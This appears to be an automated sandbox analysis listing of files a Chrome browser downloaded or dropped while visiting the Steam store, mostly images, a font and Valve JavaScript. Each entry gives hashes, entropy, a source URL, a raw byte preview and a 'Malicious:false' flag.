        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[7247],{88765:(t,i,r)=>{var o;r.d(i,{Z:()=>N});function e(t,i,r){null!=t&&("number"==typeof t?this.fromNumber(t,i,r):null==i&&"string"!=typeof t?this.fromString(t,256):this.fromString(t,i))}function s(){return new e(null)}"Microsoft Internet Explorer"==navigator.appName?(e.prototype.am=function(t,i,r,o,e,s){for(var n=32767&i,h=i>>15;--s>=0;){var u=32767&this[t],a=this[t++]>>15,f=h*u+a*n;e=((u=n*u+((32767&f)<<15)+r[o]+(1073741823&e))>>>30)+(f>>>15)+h*a+(e>>>30),r[o++]=1073741823&u}return e},o=30):"Netscape"!=navigator.appName?(e.prototype.am=function(t,i,r,o,e,s){for(;--s>=0;){var n=i*this[t++]+r[o]+e;e=Math.floor(n/67108864),r[o++]=67108863&n}return e},o=26):(e.prototype.am=function(t,i,r,o,e,s){for(var n=16383&i,h=i>>14;--s>=0;){var u=16383&this[t],a=th
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x337, components 3
        Category:dropped
        Size (bytes):88337
        Entropy (8bit):7.972642145594433
        Encrypted:false
        SSDEEP:1536:JBZyfBTVCSanUF5Krswe/5/4nI9mI6CESAs7vAjdt1nR7vODnhs0Ps1oh2TG:XyTVCG5lb/5gnI9tMSAsMfD7mDnhs0Pf
        MD5:C53A2DC5A8DFEF347A6C29C275872D30
        SHA1:8648A967ACCC30905AED1A52F071270DD83D3B9B
        SHA-256:489ED1E4DC4859460A0AA3DCC8F56CAD33BC016D0A71723C63CC2C00F5E77341
        SHA-512:09BE80619DC6287A02302B259400629DA671B079174429733FBCE8C2A8B0E13B792DEC8815E73F33E98C365D6979BB442BC8577C5928EFAC9EA70B3E560811AE
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................Q.X............................................_.........................!.1..AQ."a.2q..#...BRbr...$3s.....456CSt....7cu....%..DTev...&(8Ed..................................7.......................!1AQ.."2aq..B.....R...#3..$bCr............?....hv}e.p..z.c.j-.... (2.U..{c..q.Km..."..q.F.:..$.-..G.}.p..c...KTE...x..k..j..........\...`...G.v..GPx?....R...&....GRd.a...R....s.c.e5.\.:.j.ZWB..2.\.2...|[.j.x.1............*.2..k.9.$s.M0...A.1KP...rA..../..Lx..+l..S)A.;.5.L.HY..K....%..V-.A.E%UR../..6..*.(....|..4..."..r.eo....9...l.h...J*...U...<.9#...5...Nx.......?.J2.....m.:Z+.......=Q9....w.'..........g..W;|?agl..f....Y$.R..j......v,p0.8b..8..\y-.t.=.....9.._q..gdG_*W.@.2J=...?x....g..pE..r.YH(H>...(.....8.V1...8=#.......P.......+.K..&...Fcx..z'R..x...e%-..3.o..h..*.'.~.@i`.=U....Q....&h{..9.\h....
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):13383
        Entropy (8bit):7.942833869090401
        Encrypted:false
        SSDEEP:384:D3aWR6/lOmAcrMjgqwCkl7Xo8e+Mv+7jj:7D64mVgkl7XHe+s+7n
        MD5:446A78CEFE79E831B1DBF80AF5026054
        SHA1:27C695664B3BF3EB96672A5C27B4B6EB55B3811A
        SHA-256:1DF16E5BC981794D415B0083B4BC5B99CD14793523D5C58B0D2BFF631B7CA704
        SHA-512:0199EDEC175FA0B30E80D29995802F11811789D4DE8FA3A3A83934E1C34B1C72117FEBFD665F20E0BF3C25E8CD9191292CCA9798D3A70F1E1C4A207A6AA4EEC4
        Malicious:false
        Reputation:low
        Preview:......JFIF.....H.H.....C....................................................................C.........................................................................$............................................N.......................!...1..AQ."a.q...2B.....#3b....Rr.$Ss..%4CTt......................................#.....................!1A.Q."2aqB.............?..\v.gL....^............2 ;cAB~.......m..ZX...)E...w.0.P.....f._`z..Z...//~....Z..-..}}~X.)..zS...b...}_............`...Z.:`.?.2.3.id.e.)1q%.eA$.........&.NW&..%.f.g3<...r.|dd".P.....4.?......7o...w#.SR....k.s.Q.oxvr.u..r.l;.ON%(v^.+an.....H..\....xMg.QODB......B..I..O.........2...`..y-.o;.....Z.=I.k.R...:.|(..6d.....Cp.....R.3....z....+....c....I,Dt..1.....&.H....Y.........'.sf...x..W.....`.oC..............d.4.Zb..[...O..I........$....u...X....bN..]..........kR..).5.[.. o}.pBi=..~.+........6.|T.....$P..}...........M...U..j#/dVe...9u....Q.>VA=..Z..`z.ju..o..g..yK.s.<;....I.q.%p..!.T... ..r.1..u
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, progressive, precision 8, 306x260, components 3
        Category:downloaded
        Size (bytes):103423
        Entropy (8bit):7.977274936730541
        Encrypted:false
        SSDEEP:3072:4/TlCwue3iuH8dRRmtSup/OjKShL1RaZC1uw+BU:U+e+58p/OmSh67U
        MD5:1F740D31A6CFBEB47BFE7C6EBF257FAF
        SHA1:8B19BC55CF13795548F2C6CD9416016C19C00EFE
        SHA-256:75E9531A69FBE964C8BB64F7923DF7AF92A1D6A7817B0F3DAB1DE259A5C17692
        SHA-512:2B24E346C2E83DC5371F15417E26C08E2E079268BE13DC45D5ECCEAFCBCE6EB5A0FBCF31747ABDC6E40C455703A15CCA7D34EB7152EFDEE0CFB26AE55E16B757
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/spotlights/38a0d2ea8f8b918d69ba1664/spotlight_image_english.jpg?t=1716314333
        Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 92 x 26, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):2843
        Entropy (8bit):6.967423493204583
        Encrypted:false
        SSDEEP:48:o2/61MYLNnwknA9WpitbEsg9wlO/cHJ3z3VHi3bEs/Hc5mmDhhIZwldFWbd/9maH:/SyYRwknmWpiVbgx/mHqb/Hc5thdlubX
        MD5:41E851F8E42B6BF3414278871E93E8A2
        SHA1:A3811C7E1157F77950EC1F0558293BC90E432E82
        SHA-256:399F74C4E69EAC8B59B149293F9A573955FEF0A62B242CFA70346070013E0966
        SHA-512:F3C3549F1390B52791196E6F19584CBD4C4DB2B51FEF78C9C607C944079FED69B75E8F88594C3D647F2DDC29F282BF41BE455BE328AB27C091B4A37C41B00965
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...\.........:.;)....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmp:CreateDate="2019-08-09T13:37:29-07:00" xmp:ModifyDate="2020-06-17T17:39:04-07:00" xmp:MetadataDate="2020-06-17T17:39:04-07:00" xmpMM:InstanceID="xmp.iid:a6176093-d0df-1f4a-86f8-26e70acca1dd" xmpMM:DocumentID="adobe:docid:photoshop:5cf069c4-c89c-fa4c-8c00-dff9f3add583" xmpMM:OriginalDocumentID="x
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):43095
        Entropy (8bit):7.968374516597565
        Encrypted:false
        SSDEEP:768:U+UJGF5inF0oEh7eoWFxuTjaK6ylPmkJbCQ35YHBNhQ4DWoCQmoN2UWRzXi:U+GGF5int4ezFINzNVCQp2BjQoWoCUTJ
        MD5:C330E9EAF75E55FD694492E91BF05340
        SHA1:7EE9D7CB0E792F43E58E441C5A4D73B1664A5DAF
        SHA-256:EB579F2DCA7761CB25AFF03D707DD85F13574F5897CE6CF8C9BB1202553F6CC9
        SHA-512:85451E7920D53CD9F2F9B90642730F877597752C9CEF266B8AA4DBB29AC0C875B0CA9DCC97DDDDCBA31195B0E83E9553C54167CEF49BB328C39ACEBCCF8D4EC8
        Malicious:false
        Reputation:low
        Preview:......JFIF.....,.,.....C....................................................................C.......................................................................................................................Y..........................!..1A."Q.2aq..#B...R..$3Sbr.....8C....%45Vdsv.....cu..&DEt....................................<.....................!..1A..Q.aq..."2.....B..Rb...#r...3..............?...D.S!..X...S..L.&K.?j...!.n$=....h....y..*...I7.}...5..8...........0}....W........*....A....._.."fX.`....-.#..T..d~..-6.9....vrz...dEU..X..8...Q.y......rI.|......qD....U...Y.|.....s.G..|....s.G.A.R_..W....HQS.?.W.{...4.V...I..I.........P.>..{cH.^...i.....W7....gbEV..iN..W.n..^U.:....v...!.j....c.Q.3#..,....(.|.u8....C.I^.;....(.mRCN)..%*.Q...%...........x.%?.U.uZ..X....A....Yd..4.6IS.....u.Q._n..t.]p .N.......*Q#.!..Jw..<..lB...-O............*..4...u....p6.......R...)F.....&HM.%...V.O....V...P....-...lR.....`O..+....V_..P........l....|....u7k...2.qII.|.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 460x215, components 3
        Category:dropped
        Size (bytes):34342
        Entropy (8bit):7.970642990703992
        Encrypted:false
        SSDEEP:768:oVJZyM7lhTL8fVFcJhArGCR0/gsPHfb+cKhFl51W:ojZyMffVJhEG4RM/b+cgR1W
        MD5:554733209D5ECA787A9567B5371E5F97
        SHA1:7102998E5387BEDDF2E186F93B1A740DB23A378A
        SHA-256:068FB873C89D18B5B1BFFA148722957F6446A8B6D080335E4595C08EC0685988
        SHA-512:6592663D7ED2698AA66C9FE6FA8292A95B50A2726BB4BD7E5F4832AE15377BB0DB26648947ACC36C548244E12C1ADFB5883BA8389980B93A5F79389B122F7C01
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C......................................................................................................................R.........................!..1A.Q.."2aq..#B..3Rr..$b....%4.....CFc..'SV...5Weu.....................................F.........................!1AQ.."2aq.......#R...3Bb..T...$....Sr4D...............?......E.,.w....9U...!Bi._....I....V!...B/..C.h@E..P.X.i........7..=*H.';........p'e.'e)'.9.cT.I_*AQV.Z.`.....o...........D..V.+...~.....B.X1\F.m..x...xr.k...M...U.k.<..;...jG..\V..7..4.6.ge.q,E.....X-.Y..IS...:..j??..d.W"xZ.[.RN...U..J...0...u.T;.....#D.Oy.<..q..s/.NyG.P..a0/.-D,...;c..j..~R...KJ.....|..iQ.V....c........u:" $...Y>.....~_..TB\.M.....F}%.[_.....X4A....+..:....uF..B.8N....~`.}+....^..4...|..*.4...cl.0$.s.I'|....K..T.V..X.d(B...Hw!...m.6...Z.D=..B...T.E..I%[.L&..(BB...+t.@BF0*A...RB.{&.(D...S(J...74...Y.!.~}..Bq;.PBP....B[..E.!?....H@...O.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC 2014 (Windows), datetime=2016:11:15 17:43:02], baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):276785
        Entropy (8bit):5.568012347483792
        Encrypted:false
        SSDEEP:3072:4c+ENgXaPpAf9Y9kmmuxOlS8r5SvYdabDVqL+eAXfB/:9NgX6W1okCwMAaBvZ
        MD5:B4F887D5C551454E6885651CF8AE747A
        SHA1:416C4E64AA4DAE6D90D5A8F8A37BAD1CBD437C4C
        SHA-256:E73CB3547953369B5A29AE3F850B68C84DD36D41B5AB59F6269761C16A2E2E04
        SHA-512:8D40F47C2DF7F5E90743FD291839DB2D8FB67778B7AB2441997A9935A58171E7D4C3F941483DE3D08EDDA3C543114C1C3AB920209E60A135E2F0FC26E9F60166
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/493340/capsule_184x69.jpg?t=1709820332
        Preview:......JFIF.....H.H....(.Photoshop 3.0.8BIM.......7..Z...%G..Z...%G..Z...%G..Z...%G..Z...%G..Z...%G........8BIM.%.......z....$.".hP.pt8BIM.:....................printOutput........PstSbool.....Inteenum....Inte....Clrm....printSixteenBitbool.....printerNameTEXT...Z.\.\.p.q.-.h.p.m.4.5.1.d.n.-.3.0.6.-.m.a.r.k.e.t.i.n.g...p.r.n...c.o.r.p...f.r.o.n.t.i.e.r...c.o...u.k.\.U.n.i.t. .3.0.6. .M.a.r.k.e.t.i.n.g. .H.P. .L.a.s.e.r.J.e.t. .M.4.5.1.D.N......printProofSetupObjc.....P.r.o.o.f. .S.e.t.u.p......proofSetup........Bltnenum....builtinProof....proofCMYK.8BIM.;.....-..............printOutputOptions........Cptnbool.....Clbrbool.....RgsMbool.....CrnCbool.....CntCbool.....Lblsbool.....Ngtvbool.....EmlDbool.....Intrbool.....BckgObjc..........RGBC........Rd doub@o..........Grn doub@o..........Bl doub@o..........BrdTUntF#Rlt............Bld UntF#Rlt............RsltUntF#Pxl@R..........vectorDatabool.....PgPsenum....PgPs....PgPC....LeftUntF#Rlt............Top UntF#Rlt............Scl UntF#Prc@Y......
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7987
        Entropy (8bit):7.927181818576695
        Encrypted:false
        SSDEEP:192:eTrCqQ+1aNj/B+xSL62TeXVSP1qOJkZV+o78wJn2z/7K3S63bC:PP+AJ+xSPTeXwdqOJkZh7JnQzK3SsbC
        MD5:91BFA893C6E8C1C435099489C1E325DE
        SHA1:479F9415A85E123FC7F486BC79717A86CF51664F
        SHA-256:B0DE1AF2EEDE9E080EC8B9085399A04AA75C10B917374972319CCEEAE6434066
        SHA-512:9ECCED4136A9D4A5ECAC529647AA516C371A8BDF0574CEA4410A57B560D0B4592FC10599768D75E0668A15731EFAF286F96A3ED2831EE711A83EB985CB2B9708
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/apps/230410/capsule_184x69.jpg?t=1715792355
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................=..........................!..1"A..Qaq2.#B..b......$3R...4Cr................................1.......................!1.AQ."aq...2......B..#3............?..t.Ah...}....Ey.....PA). .td....x..0.B..o*.8.%....a.Hm.z........i...5..-.1Om.e. ..........j...c.PG.^...R..t.]..U. .q.>....ig.*C0H.1.J..v}H...O....6t..QM5.Kr:Pv.U....*..#.4...j.|[U.}..J..rq...E....@4....v...]\c.3.#i)..#.;"B...L.) ...$...~.D.Ls5..+v..s.k...y(m.d..-$..<..y..$..6v...$........GReE.E[.e...1%..4x....p...?<.n=..L.T...,9....+b3RP.n..G.T...q$...|.oQ..Z.}.....Yy2....\R...............,.....\.a.m* e.~..G.UE......4..=.R..Y#....?...[..U2m.aH.[Q.i.?Rq.?0..LR..[....@k...B.?I..+...1.B...S.%>.M=..NR..-...*.<~t$;s:.....O]H.e.......W..Tq....g......!v\.P...s....c.......)..H#.O?..&.`3..a.a...
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):1177
        Entropy (8bit):6.590984258866245
        Encrypted:false
        SSDEEP:24:c1hfvWwh82lYSgT2EV5CT3ZyJ3VNIEGdvzQvAXeho0f9Fcup2:CAvntm0J3tmzSAI4uk
        MD5:3EA2CC27536CC740703ED4554D5ACEEF
        SHA1:80EE5C2D61272C33A2D36F536CA47A38CF1A743D
        SHA-256:055F04346E95B75C4260E7064374E908FC213041679DD172DF80D6551CB5D15C
        SHA-512:969F45A845F94E02D5A5859CA033A20C7DD83774E8D032CA529A3692E74FE1816EFC3994D26E6AB874DD94F0901DC381BFA385FF096DF77B7A0C930A5B9C4734
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/icon_platform_win_dark.png?v=3
        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:95752D8EC8C611E7A1BBDD153715961C" xmpMM:InstanceID="xmp.iid:95752D8DC8C611E7A1BBDD153715961C" xmp:CreatorTool="Adobe Photoshop CS5 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:EFB48ADB4CB311E3AB3FC1E695F5A0EB" stRef:documentID="xmp.did:EFB48ADC4CB311E3AB3FC1E695F5A0EB"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..Q.....IDATx..1..0..M[....VQZo.&."x....G.....+.... .`A....J.I.....6.~.^...a..eG...6........&.c..F.p<...0.]P.y)..G.=.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (14434), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):14599
        Entropy (8bit):4.9198531640461
        Encrypted:false
        SSDEEP:384:+iMnP6zXL3CqVGE9HueUlKEghpE9umuwaswSdkT:tzWqVGsHhHE/ywad1T
        MD5:52161622668776DB5AC21B6AD4B0CBB1
        SHA1:F8BABC0C73D858F092912411BB7B451CA9AF6C6E
        SHA-256:2CD6894C338FA3A7927AC4D0FC60BCCE27C066051947175D1771CC3633123D07
        SHA-512:BFBC996AFCC90578AA16CA9A2C8C166EE37EE39EFEA785BFB3325CA6DFCA88ADA8EE3D5B2FD9F978266217C01AE1205B0B9E8775FA81A7445930C25F4FD5A6F6
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/javascript/applications/store/navevents.js?contenthash=a4eb1ee72718a7bf1c88
        Preview:.........../**** (c) Valve Corporation. Use is governed by the terms of the Steam Subscriber Agreement http://store.steampowered.com/subscriber_agreement/. ..****/.."use strict";(self.webpackChunkstore=self.webpackChunkstore||[]).push([[4103],{199:e=>{e.exports=JSON.parse('{"unknown":0,"store.steampowered.com":1,"steamcommunity.com":2,"global":3,"default":4,"application":5,"subscription":6,"search":7,"cart":8,"app":9,"global-nav":10,"global-account":11,"storemenu":12,"search-suggestion":13,"about":14,"suggest":15,"dlc":16,"storemenu-recommendedtags":17,"footer-genre-dropdown":20,"footer-category-dropdown":21,"footer-about-dropdown":22,"footer-help-dropdown":23,"footer-publisher-catalogs":24,"spotlight":40,"message":41,"marketing-message":42,"daily-deal":43,"footer":44,"header":45,"name":46,"more-details":47,"notification":48,"login":60,"prompt":61,"join-steam":62,"successful-login":63,"successful-joinsteam":64,"main-cluster":100,"featured-win-games":101,"featured-mac-games":102,"tab-Ne
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:GIF image data, version 89a, 618 x 348
        Category:downloaded
        Size (bytes):13438357
        Entropy (8bit):7.913745056545354
        Encrypted:false
        SSDEEP:196608:2NsJhZeapaXr4X+GuAz9jvQiAiCCMtmkhu0zdBrw67onQue+1jfuEi/:2SAPUuVUISMtmGuMdBrhwbfNC
        MD5:EBC4A98B214B01532362D8D6406F588D
        SHA1:3733A11582592E14A3F3AFB6DD8608F4C009E39F
        SHA-256:F79FB531EAE69661ED295E854BAF59250A2352AE00F8A4E01F5E8FE54664E31B
        SHA-512:2DDAD606F3B4C5EC38AB70F598D018DEBB7D3B8A93CB34128B0D9A1F27DD4E0AD74A3E94AE589418E0C43B5356CECC2A487F99A42D1016963EB9D3CA1C6B54CD
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/extras/S.T.A.L.K.E.R.2_the_Zone.gif?t=1705420866
        Preview:GIF89aj.\...1.............................................!.."..#..&..&..'..,..,..- .-!.....#./ ./&!0(%1$.2!.2+)3--4$.5'.5) 6+%:!.:(.:+ :/*;".;%.;&.;*.<(.>(.>*.>.#?1)?75@*.@..@4+A2$D/.D0.D7-E3.F/.F94HAAI5$I>9J7+JKTKQ_LPWO9*P2.P8.PR[Q>1QB<QFDQPUQT`QWeR=*VTZVU]VXaV]jW9.W<+WB5WKHWZeXA,XPPXW^YF;Yan\W[^B0^[a^]e^ak^dq_> _F._TR_gu`H5`I:`NFcYXdl|e_eefqejxfH3gC"gL5gN=gRGg\[gdjhYSh_^hirjn}kaaldelmxlt.mJ)mP9mSAnXHns.ojqqO2qT?qy.uM(uc\vigvmowpvw{.xY@x\HyR:y[Dyu~zh`zidzz.{aN{..|st}Z4}kg.L(.pn.us.......bI.pi.gS.z~.wt.~.....sj.xr..........hN.xm.|v.c7.gI.o[.lS.vf..|....}u................nF.qR.sV.y^..o.....|........t.....v.yT..}.|]...........q.......zQ..`..~..v........^..........................n.._..............r...........q..............w.....................!..NETSCAPE2.0.....!.......,....j.\...............................................!.."..#..&..&..'..,..,..- .-!.....#./ ./&!0(%1$.2!.2+)3--4$.5'.5) 6+%:!.:(.:+ :/*;".;%.;&.;*.<(.>(.>*.>.#?1)?75@*.@..@4+A2$D/.D0.D7-E3.F/
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 22 names, Macintosh, Copyright \251 2012, 2017, 2020 by Plau. All rights reserved.Motiva SansRegular4.015;Plau;Motiva
        Category:downloaded
        Size (bytes):122684
        Entropy (8bit):6.0666961682037535
        Encrypted:false
        SSDEEP:3072:lpsQ7l3T64Z1lKcDqttEPBWVNwZ+e222pKKSxfj9:Yg3T64Z19DqtkWbu/222kZfh
        MD5:57613E143FF3DAE10F282E84A066DE28
        SHA1:88756CC8C6DB645B5F20AA17B14FEEFB4411C25F
        SHA-256:19B8DB163BCC51732457EFA40911B4A422F297FF3CD566467D87EAB93CEF0C14
        SHA-512:94F045E71B9276944609CA69FC4B8704E4447F9B0FC2B80789CC012235895C50EF9ECB781A3ED901A0C989BED26CAA37D4D4A9BAFFCCE2CB19606DBB16A17176
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/shared/fonts/MotivaSans-Regular.ttf?v=4.015
        Preview:........... DSIG.......4....GDEF...4...,...@GPOS:>}....l..uzGSUB.d....v.....OS/2u6.........`cmap.d..........cvt F......|....fpgm.6!....D....gasp.......t....glyf._m....|....head...H...l...6hhea...G.......$hmtx..l.........locaCH..........maxp.......X... name..l...x...opost............prep.......\...................................s...t.u...v......./......... .Q...........D..DFLT..latn. .................!.:..AZE .HCAT .VCRT .dKAZ .rMOL ..NLD ..ROM ..TAT ..TRK ...............".............#.............$.............%.............&.............'.............(.............).............*........... .+.,cpsp..cpsp..cpsp..cpsp..cpsp."cpsp.(cpsp..cpsp.4cpsp.:cpsp.@cpsp.Fkern.Lkern.Tkern.\kern.dkern.lkern.tkern.|kern..kern..kern..kern..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mark..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk..mkmk."mkmk.,mkmk.6mkmk.@mkmk.J..................................................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):3900
        Entropy (8bit):7.871408199926127
        Encrypted:false
        SSDEEP:48:vVXl6WEqqgBlS4npcoY3JRT6SFaLi84Is5oB9O8k+RibWkx9UhFVU4OEus/ujWBj:vJo1OdnpcP5Zg6Eibvoh3bequjOvEej
        MD5:885B980323E687BE376BB4547B1BD8BF
        SHA1:DB9788818F04603DB83FCB83B6DCF7BD227FECC2
        SHA-256:2A57CB8563CFB988EF6F137E98AF4DD8EF4E73CBAC7B0D1F207306928B56E157
        SHA-512:A3D2C1CB9FFE7669FC10DD747AE8401466C53FD5FCB6A254F586B05A2B9A05B2F45666016AEE753B5DCB378BB2F1E64BE8F4D80895B17292BAEA4002D0DEB1C2
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_56701d30ad7847f29aab0611bf7cccf7eab72d6a.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................E..........................!.1A."Qq2a......#Br..345Rbs.$.....6St...................................3.......................!1AQ."q.2a...BC...#3R.................?.Y..ow....,p.hu..r..6.9$..E.-.......E.v....*.8....{q.Q..)?.rv6."*LbD.B.\.....T.m..<...?y....U...Ym*.^e.q...qo8}..|p.7......?....?...l.A.&:E...1.....'.Q.........o.2<..^....1.I.VZm.R....b...6.v.......h.....I.;u.......'..m.a6O..P.....,..B.O.%....X{..E...r|....jfg.N...c.>.E.P...F...%.67..*.....70NR....e.U}.B,-a..+..)..m..Rfl......G..v..k.c.....*..........5...J....C...a..v.B.k..0.........R..w...\l..?(.EHR*N.]......R.._..........|...T.....uJ.$..i>.g.'..*Z.L/._...~....>.k)....u`{e...~..Rt..3+.<.Y..@.....qj.........h..4....M....%....H^r}EJ.F._.dT.I.=..2K.u^.......q...`.J....wi....zJ..X.....T)..$8.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 500x350, components 3
        Category:downloaded
        Size (bytes):64125
        Entropy (8bit):7.966791375074659
        Encrypted:false
        SSDEEP:1536:Nmz4iejiNh0PMXfMR0eSmEnMM5JuQ8hNd++I:NmzyGAPR0eSxJ1MY+I
        MD5:D36402812E0C39296FC5C846F6D03D4A
        SHA1:10E5B2C9671086B456660AF95E80A806226D558A
        SHA-256:4A5EF4F233C32B83DEDCF77DB028AEFF8BE5836C1FD589571F22855958D76543
        SHA-512:21680A941D87A58FDAA418EE6BC12070CE172B53C409AE7B4C5115FFD58671290A9B183461078F341615DCC38C65C734B7E6E98D47589C51446E7EDAFFD0C60E
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/frontpage/eb193c51e2c473096f72216e/page_bg_mobile_english.jpg?t=1716506545
        Preview:......Exif..II*.................Ducky.......<......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:08E3DEAC7543EA11BDE8B47652FD8F39" xmpMM:DocumentID="xmp.did:C8DAD03D13B011EF8E89969DB002DB90" xmpMM:InstanceID="xmp.iid:C8DAD03C13B011EF8E89969DB002DB90" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:abbeb306-73fa-3c48-b973-6bc0d661673a" stRef:documentID="adobe:docid:photoshop:0de3147e-02ed-f744-91cf-5e02683ce0e6"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...XICC_PROFILE......HLino....mntrRGB XYZ .
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:downloaded
        Size (bytes):7951
        Entropy (8bit):7.938505936540078
        Encrypted:false
